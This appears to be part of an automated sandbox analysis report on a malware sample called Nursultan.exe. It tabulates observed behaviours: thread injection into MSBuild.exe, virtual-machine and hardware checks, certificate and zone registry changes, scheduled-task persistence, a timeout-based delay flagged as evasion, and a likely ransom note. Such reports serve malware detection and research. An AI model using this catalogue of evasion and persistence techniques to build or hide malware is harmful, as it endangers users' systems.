PID 5288 set thread context of 5532 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 5584 set thread context of 5824 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 6120 set thread context of 5872 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
PID 3988 set thread context of 5328 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4388 set thread context of 2476 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 5860 set thread context of 5548 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3904 set thread context of 5396 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 1800 set thread context of 2184 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 5596 set thread context of 516 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 2552 set thread context of 2216 N/A N/A
PID 5612 set thread context of 2552 N/A N/A
PID 6004 set thread context of 1280 N/A N/A
PID 3400 set thread context of 64 N/A N/A
PID 1548 set thread context of 4512 N/A N/A
PID 5364 set thread context of 5336 N/A N/A
PID 1892 set thread context of 4420 N/A N/A
PID 5244 set thread context of 1896 N/A N/A
PID 5376 set thread context of 5808 N/A N/A
PID 360 set thread context of 3100 N/A N/A
PID 4984 set thread context of 6628 N/A N/A
PID 6680 set thread context of 6452 N/A N/A
PID 6292 set thread context of 6624 N/A N/A
PID 6196 set thread context of 5244 N/A N/A
PID 6636 set thread context of 6652 N/A N/A
PID 6192 set thread context of 7040 N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\1601268389\715946058.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\rescache\_merged\4183903823\2290032291.pri C:\Windows\system32\taskmgr.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier N/A N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A N/A N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs N/A N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates N/A N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 N/A N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" N/A N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" N/A N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 N/A N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings C:\Windows\system32\taskmgr.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings N/A N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
